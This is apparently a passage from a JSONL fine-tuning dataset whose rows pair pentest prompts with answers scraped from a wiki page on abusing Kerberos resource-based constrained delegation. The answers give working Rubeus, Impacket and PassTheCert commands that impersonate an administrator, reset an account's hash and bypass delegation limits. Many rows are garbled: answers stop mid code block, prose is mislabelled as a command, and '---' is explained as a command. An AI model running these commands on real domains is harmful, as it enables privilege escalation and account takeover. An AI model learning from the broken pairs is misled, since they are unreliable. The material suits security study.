commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$) during a pentest?"}, {"role": "assistant", "content": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'RBCD' -Identity 'CN=WANHADELHEG,CN=Computers,DC=X' -Target 'CN=RBESEEDEE,CN=Computers,DC=X'\n``\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nRubeus can then be used to request the TGT and \"impersonation ST\", and inject it for later use.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$) during a pentest?", "response": "Invoke-PassTheCert -Action 'LDAPExploit' -LdapConnection $LdapConnection -Exploit 'RBCD' -Identity 'CN=WANHADELHEG,CN=Computers,DC=X' -Target 'CN=RBESEEDEE,CN=Computers,DC=X'\n``\n\n---\nStep 2: obtain a ticket (delegation operation) :ticket: \n\nRubeus can then be used to request the TGT and \"impersonation ST\", and inject it for later use.\n\n``powershell", "metadata": {"corpus_index": 554, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$)"}, {"role": "assistant", "content": "---\n**Step 2**: obtain a ticket (delegation operation) :ticket: \n\n[Rubeus](https://github.com/GhostPack/Rubeus) can then be used to request the TGT and \"impersonation ST\", and inject it for later use."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$)", "response": "---\n**Step 2**: obtain a ticket (delegation operation) :ticket: \n\n[Rubeus](https://github.com/GhostPack/Rubeus) can then be used to request the TGT and \"impersonation ST\", and inject it for later use.", "metadata": {"corpus_index": 555, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `---`?"}, {"role": "assistant", "content": "This command is used for add an object (e.g. wanhadelheg$) to the msds-allowedtoactonbehalfofotheridentity of the targeted computer (e.g. rbeseedee$). Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `---`?", "response": "This command is used for add an object (e.g. wanhadelheg$) to the msds-allowedtoactonbehalfofotheridentity of the targeted computer (e.g. rbeseedee$). Add an object (e.g. WANHADELHEG$) to the msDS-AllowedToActOnBehalfOfOtherIdentity of the targeted computer (e.g. RBESEEDEE$)", "metadata": {"corpus_index": 555, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain OR - Request a TGT for a specific account"}, {"role": "assistant", "content": "Rubeus.exe asktgt /user:\"controlledaccountwithSPN\" /aes256:$aesKey /nowrap"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain OR - Request a TGT for a specific account", "response": "Rubeus.exe asktgt /user:\"controlledaccountwithSPN\" /aes256:$aesKey /nowrap", "metadata": {"corpus_index": 556, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on OR - Request a TGT for a specific account"}, {"role": "assistant", "content": "Rubeus.exe asktgt /user:\"controlledaccountwithSPN\" /aes256:$aesKey /nowrap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on OR - Request a TGT for a specific account", "response": "Rubeus.exe asktgt /user:\"controlledaccountwithSPN\" /aes256:$aesKey /nowrap", "metadata": {"corpus_index": 556, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Request the \"impersonation\" service ticket using RC4 Key?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"cifs/target\" /domain:\"domain\" /user:\"controlledaccountwithSPN\" /rc4:$NThash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Request the \"impersonation\" service ticket using RC4 Key?", "response": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"cifs/target\" /domain:\"domain\" /user:\"controlledaccountwithSPN\" /rc4:$NThash", "metadata": {"corpus_index": 557, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Request the \"impersonation\" service ticket using RC4 Key"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"cifs/target\" /domain:\"domain\" /user:\"controlledaccountwithSPN\" /rc4:$NThash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Request the \"impersonation\" service ticket using RC4 Key", "response": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"cifs/target\" /domain:\"domain\" /user:\"controlledaccountwithSPN\" /rc4:$NThash", "metadata": {"corpus_index": 557, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN?"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"host/target\" /altservice:cifs,ldap /domain:\"domain\" /user:\"controlledaccountwithSPN\" /ticket:$kirbiB64tgt\n``\n\nThe NT hash and AES keys can be computed as follows.\n\n`powershell\nRubeus.exe hash /password:$password\nRubeus.exe hash /user:$username /domain:\"domain.local\" /password:$password\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the /bronzebit flag to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more services. This technique can be exploited with the /altservice` flag with Rubeus.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN?", "response": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"host/target\" /altservice:cifs,ldap /domain:\"domain\" /user:\"controlledaccountwithSPN\" /ticket:$kirbiB64tgt\n``\n\nThe NT hash and AES keys can be computed as follows.\n\n`powershell\nRubeus.exe hash /password:$password\nRubeus.exe hash /user:$username /domain:\"domain.local\" /password:$password\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the /bronzebit flag to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more services. This technique can be exploited with the /altservice` flag with Rubeus.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).\n\n:::", "metadata": {"corpus_index": 558, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN"}, {"role": "assistant", "content": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"host/target\" /altservice:cifs,ldap /domain:\"domain\" /user:\"controlledaccountwithSPN\" /ticket:$kirbiB64tgt\n``\n\nThe NT hash and AES keys can be computed as follows.\n\n`powershell\nRubeus.exe hash /password:$password\nRubeus.exe hash /user:$username /domain:\"domain.local\" /password:$password\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the /bronzebit flag to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more services. This technique can be exploited with the /altservice` flag with Rubeus.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN", "response": "Rubeus.exe s4u /nowrap /impersonateuser:\"administrator\" /msdsspn:\"host/target\" /altservice:cifs,ldap /domain:\"domain\" /user:\"controlledaccountwithSPN\" /ticket:$kirbiB64tgt\n``\n\nThe NT hash and AES keys can be computed as follows.\n\n`powershell\nRubeus.exe hash /password:$password\nRubeus.exe hash /user:$username /domain:\"domain.local\" /password:$password\n`\n\n> [!CAUTION]\n> In some cases, the delegation will not work. Depending on the context, the bronze bit vulnerability (CVE-2020-17049) can be used with the /bronzebit flag to try to bypass restrictions.\n\n> [!TIP]\n> The SPN (Service Principal Name) set can have an impact on what services will be reachable. For instance, cifs/target.domain or host/target.domain will allow most remote dumping operations (more info on adsecurity.org). There however scenarios where the SPN can be changed (AnySPN) to access more services. This technique can be exploited with the /altservice` flag with Rubeus.\n\n---\nStep 3: Pass-the-ticket :passport_control: \n\nOnce the ticket is injected, it can natively be used when accessing the service (see pass-the-ticket).\n\n:::", "metadata": {"corpus_index": 558, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the The syntax for or - request the \"impersonation\" service ticket using tgt ticket of the controlledaccountwithspn?"}, {"role": "assistant", "content": "The NT hash and AES keys can be computed as follows."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the The syntax for or - request the \"impersonation\" service ticket using tgt ticket of the controlledaccountwithspn?", "response": "The NT hash and AES keys can be computed as follows.", "metadata": {"corpus_index": 559, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "The"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN?"}, {"role": "assistant", "content": "The NT hash and AES keys can be computed as follows."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN?", "response": "The NT hash and AES keys can be computed as follows.", "metadata": {"corpus_index": 559, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `The NT hash and AES keys can be computed as follows.`?"}, {"role": "assistant", "content": "This command is used for or - request the \"impersonation\" service ticket using tgt ticket of the controlledaccountwithspn. OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `The NT hash and AES keys can be computed as follows.`?", "response": "This command is used for or - request the \"impersonation\" service ticket using tgt ticket of the controlledaccountwithspn. OR - Request the \"impersonation\" service ticket using TGT Ticket of the controlledaccountwithSPN", "metadata": {"corpus_index": 559, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of (RBCD) Resource-based constrained - RBCD on SPN-less users"}, {"role": "assistant", "content": "In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. In this case, the first (edit the \"rbcd\" attribute) and last (\"Pass-the-ticket\") steps are the same. Only the \"Obtain a ticket\" step changes.\n\nThe technique is as follows:\n\n1. Obtain a TGT for the SPN-less user allowed to delegate to a target and retrieve the TGT session key.\n2. Change the user's password hash and set it to the TGT session key.\n3. Combine S4U2self and U2U so that the SPN-less user can obtain a service ticket to itself, on behalf of another (powerful) user, and then proceed to S4U2proxy to obtain a service ticket to the target the user can delegate to, on behalf of the other, more powerful, user.\n4. Pass the ticket and access the target, as the delegated other\n\n> [!NOTE]\n> While this technique allows for an abuse of the RBCD primitive, even when the MachineAccountQuota is set to 0, or when the absence of LDAPS limits the creation of computer accounts, it requires a sacrificial user account. In the abuse process, the user account's password hash will be reset with another hash that has no known plaintext, effectively preventing regular users from using this account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket (Python) scripts can be used to operate that technique. At the time of writing, September 7th 2022, some of the tools used below are in Pull Requests still being reviewed before merge (#1201 and #1202).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of (RBCD) Resource-based constrained - RBCD on SPN-less users", "response": "In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. In this case, the first (edit the \"rbcd\" attribute) and last (\"Pass-the-ticket\") steps are the same. Only the \"Obtain a ticket\" step changes.\n\nThe technique is as follows:\n\n1. Obtain a TGT for the SPN-less user allowed to delegate to a target and retrieve the TGT session key.\n2. Change the user's password hash and set it to the TGT session key.\n3. Combine S4U2self and U2U so that the SPN-less user can obtain a service ticket to itself, on behalf of another (powerful) user, and then proceed to S4U2proxy to obtain a service ticket to the target the user can delegate to, on behalf of the other, more powerful, user.\n4. Pass the ticket and access the target, as the delegated other\n\n> [!NOTE]\n> While this technique allows for an abuse of the RBCD primitive, even when the MachineAccountQuota is set to 0, or when the absence of LDAPS limits the creation of computer accounts, it requires a sacrificial user account. In the abuse process, the user account's password hash will be reset with another hash that has no known plaintext, effectively preventing regular users from using this account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket (Python) scripts can be used to operate that technique. At the time of writing, September 7th 2022, some of the tools used below are in Pull Requests still being reviewed before merge (#1201 and #1202).\n\n```bash", "metadata": {"corpus_index": 560, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on (RBCD) Resource-based constrained - RBCD on SPN-less users"}, {"role": "assistant", "content": "In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. In this case, the first (edit the \"rbcd\" attribute) and last (\"Pass-the-ticket\") steps are the same. Only the \"Obtain a ticket\" step changes.\n\nThe technique is as follows:\n\n1. Obtain a TGT for the SPN-less user allowed to delegate to a target and retrieve the TGT session key.\n2. Change the user's password hash and set it to the TGT session key.\n3. Combine S4U2self and U2U so that the SPN-less user can obtain a service ticket to itself, on behalf of another (powerful) user, and then proceed to S4U2proxy to obtain a service ticket to the target the user can delegate to, on behalf of the other, more powerful, user.\n4. Pass the ticket and access the target, as the delegated other\n\n> [!NOTE]\n> While this technique allows for an abuse of the RBCD primitive, even when the MachineAccountQuota is set to 0, or when the absence of LDAPS limits the creation of computer accounts, it requires a sacrificial user account. In the abuse process, the user account's password hash will be reset with another hash that has no known plaintext, effectively preventing regular users from using this account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket (Python) scripts can be used to operate that technique. At the time of writing, September 7th 2022, some of the tools used below are in Pull Requests still being reviewed before merge (#1201 and #1202).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on (RBCD) Resource-based constrained - RBCD on SPN-less users", "response": "In 2022, Jame Forshaw demonstrated that the SPN requirement wasn't completely mandatory and RBCD could be operated without: Exploiting RBCD using a normal user. While this technique is a bit trickier and should absolutely be avoided on regular user accounts (the technique renders them unusable for normal people), it allows to abuse RBCD even if the MachineAccountQuota is set to 0. In this case, the first (edit the \"rbcd\" attribute) and last (\"Pass-the-ticket\") steps are the same. Only the \"Obtain a ticket\" step changes.\n\nThe technique is as follows:\n\n1. Obtain a TGT for the SPN-less user allowed to delegate to a target and retrieve the TGT session key.\n2. Change the user's password hash and set it to the TGT session key.\n3. Combine S4U2self and U2U so that the SPN-less user can obtain a service ticket to itself, on behalf of another (powerful) user, and then proceed to S4U2proxy to obtain a service ticket to the target the user can delegate to, on behalf of the other, more powerful, user.\n4. Pass the ticket and access the target, as the delegated other\n\n> [!NOTE]\n> While this technique allows for an abuse of the RBCD primitive, even when the MachineAccountQuota is set to 0, or when the absence of LDAPS limits the creation of computer accounts, it requires a sacrificial user account. In the abuse process, the user account's password hash will be reset with another hash that has no known plaintext, effectively preventing regular users from using this account.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket (Python) scripts can be used to operate that technique. At the time of writing, September 7th 2022, some of the tools used below are in Pull Requests still being reviewed before merge (#1201 and #1202).\n\n```bash", "metadata": {"corpus_index": 560, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Obtain a TGT through overpass-the-hash to use RC4 work?"}, {"role": "assistant", "content": "getTGT.py -hashes :$(pypykatz crypto nt 'SomePassword') 'domain'/'controlledaccountwithoutSPN'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Obtain a TGT through overpass-the-hash to use RC4 work?", "response": "getTGT.py -hashes :$(pypykatz crypto nt 'SomePassword') 'domain'/'controlledaccountwithoutSPN'", "metadata": {"corpus_index": 561, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Obtain a TGT through overpass-the-hash to use RC4?"}, {"role": "assistant", "content": "getTGT.py -hashes :$(pypykatz crypto nt 'SomePassword') 'domain'/'controlledaccountwithoutSPN'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Obtain a TGT through overpass-the-hash to use RC4?", "response": "getTGT.py -hashes :$(pypykatz crypto nt 'SomePassword') 'domain'/'controlledaccountwithoutSPN'", "metadata": {"corpus_index": 561, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Obtain the TGT session key?"}, {"role": "assistant", "content": "describeTicket.py 'TGT.ccache' | grep 'Ticket Session Key'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Obtain the TGT session key?", "response": "describeTicket.py 'TGT.ccache' | grep 'Ticket Session Key'", "metadata": {"corpus_index": 562, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Obtain the TGT session key?"}, {"role": "assistant", "content": "describeTicket.py 'TGT.ccache' | grep 'Ticket Session Key'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Obtain the TGT session key?", "response": "describeTicket.py 'TGT.ccache' | grep 'Ticket Session Key'", "metadata": {"corpus_index": 562, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Change the controlledaccountwithoutSPN's NT hash with the TGT session key?"}, {"role": "assistant", "content": "changepasswd.py -newhashes :TGTSessionKey 'domain'/'controlledaccountwithoutSPN':'SomePassword'@'DomainController'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Change the controlledaccountwithoutSPN's NT hash with the TGT session key?", "response": "changepasswd.py -newhashes :TGTSessionKey 'domain'/'controlledaccountwithoutSPN':'SomePassword'@'DomainController'", "metadata": {"corpus_index": 563, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Change the controlledaccountwithoutSPN's NT hash with the TGT session key during a pentest?"}, {"role": "assistant", "content": "changepasswd.py -newhashes :TGTSessionKey 'domain'/'controlledaccountwithoutSPN':'SomePassword'@'DomainController'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Change the controlledaccountwithoutSPN's NT hash with the TGT session key during a pentest?", "response": "changepasswd.py -newhashes :TGTSessionKey 'domain'/'controlledaccountwithoutSPN':'SomePassword'@'DomainController'", "metadata": {"corpus_index": 563, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy (the steps could be conducted individually with the -self and -additional-ticket flags)"}, {"role": "assistant", "content": "KRB5CCNAME='TGT.ccache' getST.py -u2u -impersonate \"Administrator\" -spn \"host/target.domain.com\" -k -no-pass 'domain'/'controlledaccountwithoutSPN'"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Obtain the delegated service ticket through S4U2self+U2U, followed by S4U2proxy (the steps could be conducted individually with the -self and -additional-ticket flags)", "response": "KRB5CCNAME='TGT.ccache' getST.py -u2u -impersonate \"Administrator\" -spn \"host/target.domain.com\" -k -no-pass 'domain'/'controlledaccountwithoutSPN'", "metadata": {"corpus_index": 564, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/delegations/rbcd.md", "page_title": "(RBCD) Resource-based constrained", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. 